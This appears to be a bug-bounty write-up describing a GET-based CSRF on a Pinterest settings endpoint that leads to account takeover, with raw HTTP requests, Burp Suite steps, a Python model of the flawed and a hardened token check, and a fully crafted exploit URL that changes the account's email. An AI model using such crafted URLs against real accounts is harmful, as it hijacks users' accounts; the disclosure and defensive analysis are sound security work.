Part 18: CSRF Leading to Account Takeover
Where is the bug?
While browsing "https://www.pinterest.com", I noticed that the CSRF token is passed in the HTTP header "X-CSRFToken", so a request that is normally subject to CSRF token validation looks like this:
POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1
Host: www.pinterest.com
Content-Type: application/x-www-form-urlencoded
X-CSRFToken: <CSRF Token>
……..
……..
<POST Parameters>
1) First, I removed the "X-CSRFToken" header from the POST request and forwarded it through Burp Suite. The server responded with the error "/resource/UserSettingsResource/update/ didn't finish after 8 seconds", which means the CSRF token was being validated.
2) Then I changed the above POST request to a GET request, again removing "X-CSRFToken"; after forwarding it I got a "200 OK" response.
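The root cause described in steps 1) and 2) is a CSRF check that is keyed on the request method rather than on the action: the token is enforced for POST but a GET reaching the same endpoint is accepted without one. The following Python is an added illustration, not Pinterest's code; it models the flawed behaviour described above beside a corrected check, assuming a per-session token stored server-side (constructed here as a fixed string) and using the UserSettingsResource path from the write-up as the only state-changing endpoint. A small parser for raw HTTP/1.1 requests is included so the three cases from the write-up can be replayed offline against both checks.

```python
import hmac
from urllib.parse import parse_qs, urlsplit

# Constructed per-session token for this example; a real server generates one
# per session, stores it server-side and compares it in constant time.
SESSION_CSRF_TOKEN = "0123456789abcdef0123456789abcdef"

# Endpoints that change server state. The path is the one from the write-up;
# treating it as the only such endpoint is an assumption of this example.
STATE_CHANGING_PATHS = {"/_ngjs/resource/UserSettingsResource/update/"}

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def parse_request(raw):
    """Parse a minimal raw HTTP/1.1 request into (method, path, headers, params).

    Parameters are read from the query string for any method and, for
    form-encoded bodies, from the body as well; header names are lower-cased.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update({k: v[0] for k, v in parse_qs(body).items()})
    return method, url.path, headers, params


def vulnerable_csrf_check(method, path, headers):
    """Flawed check modelled on the behaviour described in the write-up:
    only POST is validated, so a GET to the same endpoint needs no token."""
    if method == "POST":
        return hmac.compare_digest(headers.get("x-csrftoken", ""), SESSION_CSRF_TOKEN)
    return True


def hardened_csrf_check(method, path, headers):
    """Token validation keyed on the endpoint, not the method: a state-changing
    path must be reached with an unsafe method and carry a valid token,
    regardless of whether the parameters arrived in the body or the query."""
    if path not in STATE_CHANGING_PATHS:
        return True
    if method in SAFE_METHODS:
        return False  # safe methods must never perform state changes
    return hmac.compare_digest(headers.get("x-csrftoken", ""), SESSION_CSRF_TOKEN)


def handle(raw, check):
    """Return the status the server would answer with under the given check."""
    method, path, headers, _params = parse_request(raw)
    return 200 if check(method, path, headers) else 403


# Constructed sample requests mirroring the three cases in the write-up.
POST_WITH_TOKEN = (
    "POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1\r\n"
    "Host: www.pinterest.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"X-CSRFToken: {SESSION_CSRF_TOKEN}\r\n"
    "\r\n"
    "source_url=%2Fsettings%2F&data=%7B%7D"
)
POST_WITHOUT_TOKEN = (
    "POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1\r\n"
    "Host: www.pinterest.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "source_url=%2Fsettings%2F&data=%7B%7D"
)
GET_WITHOUT_TOKEN = (
    "GET /_ngjs/resource/UserSettingsResource/update/?source_url=%2Fsettings%2F&data=%7B%7D HTTP/1.1\r\n"
    "Host: www.pinterest.com\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, req in [("POST+token", POST_WITH_TOKEN),
                      ("POST-token", POST_WITHOUT_TOKEN),
                      ("GET-token", GET_WITHOUT_TOKEN)]:
        print(name, "vulnerable:", handle(req, vulnerable_csrf_check),
              "hardened:", handle(req, hardened_csrf_check))
```

Under the flawed check the GET without a token is answered 200, which is exactly the observation in step 2); under the corrected check it is refused, and the POST cases behave as before. The design point is that the decision "does this request need a CSRF token?" must depend on what the endpoint does, and state-changing endpoints should additionally refuse safe methods outright so that parameters moved into the query string never reach the handler.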
Account takeover
This is a GET-based CSRF. All we need to do is craft a URL that passes every parameter originally sent via POST as GET query parameters instead (not every application accepts this; Burp Suite's built-in "change request method" can be used to convert the request):
https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/?source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22impressum_url%22%3Anull%2C%22last_name%22%3A%22dummy%22%2C%22custom_gender%22%3Anull%2C%22locale%22%3A%22en-US%22%2C%22has_password%22%3Atrue%2C%22email_settings%22%3A%22Everything+%28except+emails+you%27ve+turned+off%29%22%2C%22news_settings%22%3A%22Activity+from+other+people+on+Pinterest%22%2C%22id%22%3A%22%22%2C%22is_write_banned%22%3Afalse%2C%22first_name%22%3A%22dummyuser%22%2C%22push_settings%22%3A%22Everything+%28except+push+you%27ve+turned+off%29%22%2C%22personalize_from_offsite_browsing%22%3Atrue%2C%22facebook_timeline_enabled%22%3Afalse%2C%22email_changing_to%22%3Anull%2C%22personalize_nux_from_offsite_browsing%22%3Afalse%2C%22is_tastemaker%22%3Afalse%2C%22type%22%3A%22user_settings%22%2C%22email%22%3A%22anytestemail%40user.com%22%2C%22website_url%22%3A%22%22%2C%22location%22%3A%22%22%2C%22username%22%3A%22dummyuser%22%2C%22pfy_preference%22%3Atrue%2C%22facebook_publish_stream_enabled%22%3Afalse%2C%22email_bounced%22%3Afalse%2C%22is_partner%22%3Anull%2C%22ads_customize_from_conversion%22%3Atrue%2C%22additional_website_urls%22%3A%5B%5D%2C%22about%22%3A%22test%22%2C%22gender%22%3A%22male%22%2C%22age%22%3Anull%2C%22exclude_from_search%22%3Afalse%2C%22birthdate%22%3Anull%2C%22show_impressum%22%3Afalse%2C%22email_biz_settings%22%3A%22Everything+%28includes+announcements%2C+expert+tips%2C+creative+ideas%2C+and+more%29%22%2C%22country%22%3A%22IN%22%2C%22hide_from_news%22%3Afalse%2C%22collaborative_boards%22%3A%5B%5D%7D%2C%22context%22%3A%7B%7D%7D